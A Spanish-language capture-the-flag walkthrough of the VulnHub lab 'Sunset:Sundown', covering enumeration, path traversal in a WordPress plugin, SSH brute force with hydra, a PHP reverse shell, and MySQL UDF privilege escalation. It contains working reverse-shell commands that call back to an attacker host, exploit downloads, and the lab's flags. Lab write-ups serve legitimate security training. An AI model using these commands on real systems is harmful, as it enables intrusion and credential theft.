[VULNHUB] Sunset:Sundown

Hoy vamos a hackear la maquina de Vulnhub llamada Potato. Podeis descargarla desde el siguiente enlace: Sunset:Sundown

Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.20                                                  
                                                                               
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-11 11:17 CEST
Nmap scan report for 192.168.1.20
Host is up (0.00028s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 90:ba:81:81:b6:ec:5b:33:87:f8:73:3d:82:ca:e5:dd (RSA)
|   256 e1:bd:70:79:91:22:86:c8:e1:f5:80:ed:4a:b7:dd:ad (ECDSA)
|_  256 9f:03:af:27:89:8a:8e:b5:c0:68:05:44:74:d3:6b:d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Sundown – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds
Nmap nos muestra que el robots.txt tiene una entrada disallowed: /wp-admin. Exploramos con wpscan para ver si vemos algo interesante!

~ > wpscan --url http://192.168.1.20
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.1.20/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.20/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss

[+] WordPress readme found: http://192.168.1.20/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: 
http://192.168.1.20/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.1.20/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.1.20/feed/, 
https://wordpress.org/?v=5.4.2
 |  - http://192.168.1.20/comments/feed/, 
https://wordpress.org/?v=5.4.2

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://192.168.1.20/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.20/wp-content/plugins/wp-with-spritz/readme.txt

[+] Finished: Fri Sep 11 11:18:58 2020
[+] Requests Done: 52
[+] Cached Requests: 7
[+] Data Sent: 11.176 KB
[+] Data Received: 300.866 KB
[+] Memory used: 194.34 MB
[+] Elapsed time: 00:00:08
Vemos que hay un plugin: wp-with-spritz Buscamos mas informacion sobre el y vemos que es vulnerable[1]. Lo ponemos en practica :) http://192.168.1.20/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.p hp?url=/../../../../etc/passwd En el fichero /etc/passwd podemos ver que existe el usuario llamado carlos, asi que miramos si podemos obtener su password usando hydra.

~ > hydra -l carlos -P /usr/share/wordlists/rockyou.txt 192.168.1.20 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-11 
11:26:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries 
(l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://192.168.1.20:22/
[22][ssh] host: 192.168.1.20   login: carlos   password: carlos
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-11 
11:27:06
Vemos que la password es igual que el username. Nos logueamos!

Low Shell



~ > ssh carlos@192.168.1.20                                                   
                                                                              
carlos@192.168.1.20's password: 
Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug  3 19:39:26 2020 from 192.168.100.139
carlos@sundown:~$ 

user.txt



carlos@sundown:~$ cat local.txt 
28f84888f6bd690e321cba14659b32f2
carlos@sundown:~$ 
Queremos ver el fichero wp-config.php que suele tener la password para conectarse al mysql, sin embargo nuestro usuario carlos no tiene permisos, pero si que los tiene www-data. Creamos un .php accesible desde la web que nos facilite una reverse shell, y asi obtendremos el usuario www-data que nos permitira ver el fichero.

carlos@sundown:/var/www/html/wordpress$ nano e.php
carlos@sundown:/var/www/html/wordpress$ cat e.php 
& /dev/tcp/192.168.1.59/5555 0>&1'"); ?>
carlos@sundown:/var/www/html/wordpress$ 
Ponemos nc a la escucha.

~ > nc -nlvp 5555
listening on [any] 5555 ...
Accedemos a http://192.168.1.20/e.php

~ > nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.20] 35710
bash: cannot set terminal process group (503): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sundown:/var/www/html/wordpress$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@sundown:/var/www/html/wordpress$ 
Ahora que ya somos usuario www-data, miramos el fichero wp-config.php!

www-data@sundown:/var/www/html/wordpress$ wp-config.php
/** MySQL database password */
define( 'DB_PASSWORD', 'VjFSQ2IyRnNUak5pZWpCTENnPT0K' );
Vemos que tenemos la password para conectarnos como root al mysql. Por otro lado, vemos que el usuario mysql tiene permisos de root!

Privilege Escalation


Usaremos UDF[2] para obtener una reverse shell a traves de mysql y asi tener una shell con privilegios de root. Descargamos y compilamos.

wget http://0xdeadbeef.info/exploits/raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
Movemos el fichero raptor_udf2.o a nuestro servidor web para que sea accesible.

sudo mv raptor_udf2.o /var/www/html
Nos descargamos el binario de nc, y el fichero raptor_udf2.o que hemos movido antes a nuestro servidor web.

cd /tmp
curl -o nc http://192.168.1.59/nc
curl -o raptor_udf2.o http://192.168.1.59/raptor_udf2.o
Y ahora empezamos los pasos para obtener la reverse shell. Nos conectamos al mysql.

carlos@sundown:/tmp$ mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 19
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
Seleccionamos la BBDD mysql.

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
Ejecutamos las siguientes sentencias.

MariaDB [mysql]> create table foo(line blob);
Query OK, 0 rows affected (0.029 sec)

MariaDB [mysql]> insert into foo values(load_file('/tmp/raptor_udf2.so'));
Query OK, 1 row affected (0.005 sec)

MariaDB [mysql]> show variables like '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)

MariaDB [mysql]> select * from foo into dumpfile 
"/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so";
Query OK, 1 row affected (0.000 sec)

MariaDB [mysql]> create function do_system returns integer soname 
'raptor_udf2.so';
Query OK, 0 rows affected (0.000 sec)

MariaDB [mysql]> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.000 sec)
Una vez hecho los pasos anteriores, ponemos nc a la escucha.

~ > nc -nlvp 4444
listening on [any] 4444 ...
Por ultimo en el mysql ejecutamos:

MariaDB [mysql]> select do_system('/tmp/nc 192.168.1.59 4444 -e /bin/bash &');
Y obtenemos nuestra shell con privilegios :)

~ > nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.20] 49818
id
uid=0(root) gid=0(root) groups=0(root)

root.txt



cd /root
ls
proof.txt
cat proof.txt
                              _____,,,\//,,\\,/,
                             /-- --- --- -----
                            ///--- --- -- - ----
                           o////- ---- --- --
                           !!//o/---  -- --
                         o*) !///,~,,\\,\/,,/,//,,
                           o!*!o'(\          /\
                         | ! o ",) \/\  /\  /  \/\
                        o  !o! !!|    \/  \/     /
                       ( * (  o!'; |\   \       /
                        o o ! * !` | \  /       \
                       o  |  o 'o| | :  \       /
                        *  o !*!': |o|  /      /
                            (o''| `| : /      /
                            ! *|'`  \|/       \\
                           ' !o!':\  \\        \
                            ( ('|  \  `._______/
////\\\,,\///,,,,\,/oO._*  o !*!'`  `.________/
  ---- -- ------- - -oO*OoOo (o''|           /
    --------  ------ 'oO*OoO!*|'o!!          \
-------  -- - ---- --* oO*OoO *!'| '         /
 ---  -   -----  ---- - oO*OoO!!':o!'       /
 - -  -----  -  --  - *--oO*OoOo!`         /
   \\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC

510252fabb4b7e7dddd7373b7b3da3e8

Thanks for playing - Felipe Winsnes (@whitecr0wz)

End


Y con esto ya seriamos root de la maquina. [1]https://www.exploit-db.com/exploits/44544 [2]https://redteamnation.com/mysql-user-defined-functions/